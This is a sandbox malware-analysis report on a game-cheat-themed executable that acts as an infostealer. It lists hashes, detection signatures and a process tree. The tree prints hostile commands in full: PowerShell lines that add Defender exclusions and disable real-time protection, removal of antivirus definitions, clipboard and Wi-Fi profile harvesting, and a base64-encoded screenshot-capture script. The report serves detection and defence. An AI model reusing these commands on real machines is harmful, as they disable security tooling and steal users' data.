Analysis
-
max time kernel
16s -
max time network
17s -
platform
windows11-21h2_x64 -
resource
win11-20250410-en -
resource tags
arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system -
submitted
15/04/2025, 20:05
Behavioral task
behavioral1
Sample
hoarder lifesteal overlay.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
hoarder lifesteal overlay.exe
Resource
win11-20250410-en
Behavioral task
behavioral3
Sample
�p@m.pyc
Resource
win10v2004-20250410-en
Behavioral task
behavioral4
Sample
�p@m.pyc
Resource
win11-20250410-en
General
-
Target
hoarder lifesteal overlay.exe
-
Size
7.8MB
-
MD5
d02b9386944c94fc20fcbcd5b4be2b49
-
SHA1
2a53cdd4e89eedcf4092e170047ba7a08a06e35d
-
SHA256
c6d552a9afccaaf92688218894eba03a7c788c545dc95bc7a7f8ddcba10665bb
-
SHA512
13afce2f0388a61435e67ff6d49adafed282d989181cf61f07cbdbde707161e7f3010acc2808c7290945ab8a65dc39f4b90871e1c03ba3bf0981bfbd6eb30fd8
-
SSDEEP
196608:UWUHUOXXKApXkj9fZwQRCgiIKpdzjPOan7j2y283TOnO+:qxCw8wIKppDO9i+
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4392 powershell.exe 492 powershell.exe 2168 powershell.exe 1904 powershell.exe 3752 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts hoarder lifesteal overlay.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 3988 cmd.exe 5612 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2476 rar.exe -
Loads dropped DLL 16 IoCs
pid Process 5360 hoarder lifesteal overlay.exe 5360 hoarder lifesteal overlay.exe 5360 hoarder lifesteal overlay.exe 5360 hoarder lifesteal overlay.exe 5360 hoarder lifesteal overlay.exe 5360 hoarder lifesteal overlay.exe 5360 hoarder lifesteal overlay.exe 5360 hoarder lifesteal overlay.exe 5360 hoarder lifesteal overlay.exe 5360 hoarder lifesteal overlay.exe 5360 hoarder lifesteal overlay.exe 5360 hoarder lifesteal overlay.exe 5360 hoarder lifesteal overlay.exe 5360 hoarder lifesteal overlay.exe 5360 hoarder lifesteal overlay.exe 5360 hoarder lifesteal overlay.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 discord.com 4 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 244 tasklist.exe 428 tasklist.exe 3924 tasklist.exe 4224 tasklist.exe -
resource yara_rule behavioral2/files/0x001900000002b13a-21.dat upx behavioral2/memory/5360-25-0x00007FFFA19C0000-0x00007FFFA2027000-memory.dmp upx behavioral2/files/0x001c00000002b127-27.dat upx behavioral2/files/0x001900000002b138-31.dat upx behavioral2/memory/5360-30-0x00007FFFA6270000-0x00007FFFA6297000-memory.dmp upx behavioral2/memory/5360-50-0x00007FFFA7960000-0x00007FFFA797A000-memory.dmp upx behavioral2/files/0x001a00000002b126-49.dat upx behavioral2/memory/5360-52-0x00007FFFA5370000-0x00007FFFA539B000-memory.dmp upx behavioral2/files/0x001900000002b12c-51.dat upx behavioral2/memory/5360-48-0x00007FFFAAFD0000-0x00007FFFAAFDF000-memory.dmp upx behavioral2/files/0x001900000002b132-47.dat upx behavioral2/files/0x004600000002b12f-46.dat upx behavioral2/files/0x001900000002b12e-45.dat upx behavioral2/files/0x001c00000002b12d-44.dat upx behavioral2/files/0x001900000002b129-42.dat upx behavioral2/files/0x001900000002b128-41.dat upx behavioral2/files/0x001900000002b141-39.dat upx behavioral2/files/0x001900000002b140-38.dat upx behavioral2/files/0x001c00000002b13f-37.dat upx behavioral2/files/0x001c00000002b139-34.dat upx behavioral2/files/0x001900000002b135-33.dat upx behavioral2/memory/5360-58-0x00007FFFA5340000-0x00007FFFA5365000-memory.dmp upx behavioral2/memory/5360-60-0x00007FFFA17C0000-0x00007FFFA1949000-memory.dmp upx behavioral2/memory/5360-64-0x00007FFFAAF80000-0x00007FFFAAF8D000-memory.dmp upx behavioral2/memory/5360-63-0x00007FFFA78A0000-0x00007FFFA78B9000-memory.dmp upx behavioral2/memory/5360-66-0x00007FFFA19C0000-0x00007FFFA2027000-memory.dmp upx behavioral2/memory/5360-71-0x00007FFFA20E0000-0x00007FFFA21AE000-memory.dmp upx behavioral2/memory/5360-70-0x00007FFF9D900000-0x00007FFF9DE33000-memory.dmp upx behavioral2/memory/5360-69-0x00007FFFA5300000-0x00007FFFA5333000-memory.dmp upx behavioral2/memory/5360-73-0x00007FFFA6270000-0x00007FFFA6297000-memory.dmp upx behavioral2/memory/5360-76-0x00007FFFAAC30000-0x00007FFFAAC3D000-memory.dmp upx behavioral2/memory/5360-75-0x00007FFFA5680000-0x00007FFFA5694000-memory.dmp upx behavioral2/memory/5360-81-0x00007FFFA1410000-0x00007FFFA14C3000-memory.dmp upx behavioral2/memory/5360-85-0x00007FFFA5340000-0x00007FFFA5365000-memory.dmp upx behavioral2/memory/5360-216-0x00007FFFA17C0000-0x00007FFFA1949000-memory.dmp upx behavioral2/memory/5360-304-0x00007FFFA5300000-0x00007FFFA5333000-memory.dmp upx behavioral2/memory/5360-327-0x00007FFF9D900000-0x00007FFF9DE33000-memory.dmp upx behavioral2/memory/5360-342-0x00007FFFA20E0000-0x00007FFFA21AE000-memory.dmp upx behavioral2/memory/5360-359-0x00007FFFA17C0000-0x00007FFFA1949000-memory.dmp upx behavioral2/memory/5360-353-0x00007FFFA19C0000-0x00007FFFA2027000-memory.dmp upx behavioral2/memory/5360-368-0x00007FFFA19C0000-0x00007FFFA2027000-memory.dmp upx behavioral2/memory/5360-392-0x00007FFFA20E0000-0x00007FFFA21AE000-memory.dmp upx behavioral2/memory/5360-396-0x00007FFFA1410000-0x00007FFFA14C3000-memory.dmp upx behavioral2/memory/5360-395-0x00007FFF9D900000-0x00007FFF9DE33000-memory.dmp upx behavioral2/memory/5360-394-0x00007FFFA5680000-0x00007FFFA5694000-memory.dmp upx behavioral2/memory/5360-393-0x00007FFFA5300000-0x00007FFFA5333000-memory.dmp upx behavioral2/memory/5360-391-0x00007FFFAAC30000-0x00007FFFAAC3D000-memory.dmp upx behavioral2/memory/5360-390-0x00007FFFA78A0000-0x00007FFFA78B9000-memory.dmp upx behavioral2/memory/5360-389-0x00007FFFA17C0000-0x00007FFFA1949000-memory.dmp upx behavioral2/memory/5360-388-0x00007FFFA5340000-0x00007FFFA5365000-memory.dmp upx behavioral2/memory/5360-387-0x00007FFFA5370000-0x00007FFFA539B000-memory.dmp upx behavioral2/memory/5360-386-0x00007FFFA7960000-0x00007FFFA797A000-memory.dmp upx behavioral2/memory/5360-385-0x00007FFFAAFD0000-0x00007FFFAAFDF000-memory.dmp upx behavioral2/memory/5360-384-0x00007FFFA6270000-0x00007FFFA6297000-memory.dmp upx behavioral2/memory/5360-383-0x00007FFFAAF80000-0x00007FFFAAF8D000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4520 cmd.exe 1552 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4712 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4940 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 21 IoCs
pid Process 4392 powershell.exe 2168 powershell.exe 2168 powershell.exe 4392 powershell.exe 4392 powershell.exe 492 powershell.exe 492 powershell.exe 5612 powershell.exe 5612 powershell.exe 5432 powershell.exe 5432 powershell.exe 5612 powershell.exe 2168 powershell.exe 5432 powershell.exe 492 powershell.exe 1904 powershell.exe 1904 powershell.exe 5032 powershell.exe 5032 powershell.exe 3160 powershell.exe 3160 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4392 powershell.exe Token: SeDebugPrivilege 3924 tasklist.exe Token: SeDebugPrivilege 428 tasklist.exe Token: SeDebugPrivilege 2168 powershell.exe Token: SeIncreaseQuotaPrivilege 5380 WMIC.exe Token: SeSecurityPrivilege 5380 WMIC.exe Token: SeTakeOwnershipPrivilege 5380 WMIC.exe Token: SeLoadDriverPrivilege 5380 WMIC.exe Token: SeSystemProfilePrivilege 5380 WMIC.exe Token: SeSystemtimePrivilege 5380 WMIC.exe Token: SeProfSingleProcessPrivilege 5380 WMIC.exe Token: SeIncBasePriorityPrivilege 5380 WMIC.exe Token: SeCreatePagefilePrivilege 5380 WMIC.exe Token: SeBackupPrivilege 5380 WMIC.exe Token: SeRestorePrivilege 5380 WMIC.exe Token: SeShutdownPrivilege 5380 WMIC.exe Token: SeDebugPrivilege 5380 WMIC.exe Token: SeSystemEnvironmentPrivilege 5380 WMIC.exe Token: SeRemoteShutdownPrivilege 5380 WMIC.exe Token: SeUndockPrivilege 5380 WMIC.exe Token: SeManageVolumePrivilege 5380 WMIC.exe Token: 33 5380 WMIC.exe Token: 34 5380 WMIC.exe Token: 35 5380 WMIC.exe Token: 36 5380 WMIC.exe Token: SeDebugPrivilege 4224 tasklist.exe Token: SeDebugPrivilege 492 powershell.exe Token: SeDebugPrivilege 5612 powershell.exe Token: SeIncreaseQuotaPrivilege 5380 WMIC.exe Token: SeSecurityPrivilege 5380 WMIC.exe Token: SeTakeOwnershipPrivilege 5380 WMIC.exe Token: SeLoadDriverPrivilege 5380 WMIC.exe Token: SeSystemProfilePrivilege 5380 WMIC.exe Token: SeSystemtimePrivilege 5380 WMIC.exe Token: SeProfSingleProcessPrivilege 5380 WMIC.exe Token: SeIncBasePriorityPrivilege 5380 WMIC.exe Token: SeCreatePagefilePrivilege 5380 WMIC.exe Token: SeBackupPrivilege 5380 WMIC.exe Token: SeRestorePrivilege 5380 WMIC.exe Token: SeShutdownPrivilege 5380 WMIC.exe Token: SeDebugPrivilege 5380 WMIC.exe Token: SeSystemEnvironmentPrivilege 5380 WMIC.exe Token: SeRemoteShutdownPrivilege 5380 WMIC.exe Token: SeUndockPrivilege 5380 WMIC.exe Token: SeManageVolumePrivilege 5380 WMIC.exe Token: 33 5380 WMIC.exe Token: 34 5380 WMIC.exe Token: 35 5380 WMIC.exe Token: 36 5380 WMIC.exe Token: SeDebugPrivilege 5432 powershell.exe Token: SeDebugPrivilege 244 tasklist.exe Token: SeDebugPrivilege 1904 powershell.exe Token: SeDebugPrivilege 5032 powershell.exe Token: SeIncreaseQuotaPrivilege 5180 WMIC.exe Token: SeSecurityPrivilege 5180 WMIC.exe Token: SeTakeOwnershipPrivilege 5180 WMIC.exe Token: SeLoadDriverPrivilege 5180 WMIC.exe Token: SeSystemProfilePrivilege 5180 WMIC.exe Token: SeSystemtimePrivilege 5180 WMIC.exe Token: SeProfSingleProcessPrivilege 5180 WMIC.exe Token: SeIncBasePriorityPrivilege 5180 WMIC.exe Token: SeCreatePagefilePrivilege 5180 WMIC.exe Token: SeBackupPrivilege 5180 WMIC.exe Token: SeRestorePrivilege 5180 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4836 wrote to memory of 5360 4836 hoarder lifesteal overlay.exe 78 PID 4836 wrote to memory of 5360 4836 hoarder lifesteal overlay.exe 78 PID 5360 wrote to memory of 3332 5360 hoarder lifesteal overlay.exe 79 PID 5360 wrote to memory of 3332 5360 hoarder lifesteal overlay.exe 79 PID 5360 wrote to memory of 4264 5360 hoarder lifesteal overlay.exe 80 PID 5360 wrote to memory of 4264 5360 hoarder lifesteal overlay.exe 80 PID 5360 wrote to memory of 3888 5360 hoarder lifesteal overlay.exe 81 PID 5360 wrote to memory of 3888 5360 hoarder lifesteal overlay.exe 81 PID 5360 wrote to memory of 5020 5360 hoarder lifesteal overlay.exe 85 PID 5360 wrote to memory of 5020 5360 hoarder lifesteal overlay.exe 85 PID 3332 wrote to memory of 4392 3332 cmd.exe 87 PID 3332 wrote to memory of 4392 3332 cmd.exe 87 PID 5360 wrote to memory of 3184 5360 hoarder lifesteal overlay.exe 88 PID 5360 wrote to memory of 3184 5360 hoarder lifesteal overlay.exe 88 PID 5360 wrote to memory of 2268 5360 hoarder lifesteal overlay.exe 89 PID 5360 wrote to memory of 2268 5360 hoarder lifesteal overlay.exe 89 PID 3888 wrote to memory of 4652 3888 cmd.exe 92 PID 3888 wrote to memory of 4652 3888 cmd.exe 92 PID 5360 wrote to memory of 4664 5360 hoarder lifesteal overlay.exe 93 PID 5360 wrote to memory of 4664 5360 hoarder lifesteal overlay.exe 93 PID 5360 wrote to memory of 3988 5360 hoarder lifesteal overlay.exe 94 PID 5360 wrote to memory of 3988 5360 hoarder lifesteal overlay.exe 94 PID 5360 wrote to memory of 4896 5360 hoarder lifesteal overlay.exe 97 PID 5360 wrote to memory of 4896 5360 hoarder lifesteal overlay.exe 97 PID 3184 wrote to memory of 3924 3184 cmd.exe 99 PID 3184 wrote to memory of 3924 3184 cmd.exe 99 PID 2268 wrote to memory of 428 2268 cmd.exe 100 PID 2268 wrote to memory of 428 2268 cmd.exe 100 PID 4264 wrote to memory of 2168 4264 cmd.exe 101 PID 4264 wrote to memory of 2168 4264 cmd.exe 101 PID 5360 wrote to memory of 3576 5360 hoarder lifesteal overlay.exe 102 PID 5360 wrote to memory of 3576 5360 hoarder lifesteal overlay.exe 102 PID 5360 wrote to memory of 4520 5360 hoarder lifesteal overlay.exe 104 PID 5360 wrote to memory of 4520 5360 hoarder lifesteal overlay.exe 104 PID 5360 wrote to memory of 1688 5360 hoarder lifesteal overlay.exe 105 PID 5360 wrote to memory of 1688 5360 hoarder lifesteal overlay.exe 105 PID 5360 wrote to memory of 5116 5360 hoarder lifesteal overlay.exe 107 PID 5360 wrote to memory of 5116 5360 hoarder lifesteal overlay.exe 107 PID 5360 wrote to memory of 3016 5360 hoarder lifesteal overlay.exe 109 PID 5360 wrote to memory of 3016 5360 hoarder lifesteal overlay.exe 109 PID 5020 wrote to memory of 492 5020 cmd.exe 111 PID 5020 wrote to memory of 492 5020 cmd.exe 111 PID 4896 wrote to memory of 4224 4896 cmd.exe 113 PID 4896 wrote to memory of 4224 4896 cmd.exe 113 PID 4664 wrote to memory of 5380 4664 cmd.exe 115 PID 4664 wrote to memory of 5380 4664 cmd.exe 115 PID 3988 wrote to memory of 5612 3988 cmd.exe 116 PID 3988 wrote to memory of 5612 3988 cmd.exe 116 PID 3576 wrote to memory of 3764 3576 cmd.exe 117 PID 3576 wrote to memory of 3764 3576 cmd.exe 117 PID 1688 wrote to memory of 4940 1688 cmd.exe 118 PID 1688 wrote to memory of 4940 1688 cmd.exe 118 PID 3016 wrote to memory of 5432 3016 cmd.exe 119 PID 3016 wrote to memory of 5432 3016 cmd.exe 119 PID 5116 wrote to memory of 2000 5116 cmd.exe 120 PID 5116 wrote to memory of 2000 5116 cmd.exe 120 PID 4520 wrote to memory of 1552 4520 cmd.exe 121 PID 4520 wrote to memory of 1552 4520 cmd.exe 121 PID 5360 wrote to memory of 5284 5360 hoarder lifesteal overlay.exe 122 PID 5360 wrote to memory of 5284 5360 hoarder lifesteal overlay.exe 122 PID 5360 wrote to memory of 1712 5360 hoarder lifesteal overlay.exe 124 PID 5360 wrote to memory of 1712 5360 hoarder lifesteal overlay.exe 124 PID 5284 wrote to memory of 3868 5284 cmd.exe 126 PID 5284 wrote to memory of 3868 5284 cmd.exe 126 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 4012 attrib.exe 5596 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\hoarder lifesteal overlay.exe"C:\Users\Admin\AppData\Local\Temp\hoarder lifesteal overlay.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Users\Admin\AppData\Local\Temp\hoarder lifesteal overlay.exe"C:\Users\Admin\AppData\Local\Temp\hoarder lifesteal overlay.exe"2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:5360 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\hoarder lifesteal overlay.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3332 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\hoarder lifesteal overlay.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please rerun this application.', 0, 'Rerun!', 48+16);close()""3⤵
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please rerun this application.', 0, 'Rerun!', 48+16);close()"4⤵PID:4652
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:492
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:428
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5380
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵
- Suspicious use of WriteProcessMemory
PID:3576 -
C:\Windows\system32\tree.comtree /A /F4⤵PID:3764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
PID:4520 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:4940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"3⤵
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath4⤵PID:2000
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵
- Suspicious use of WriteProcessMemory
PID:3016 -
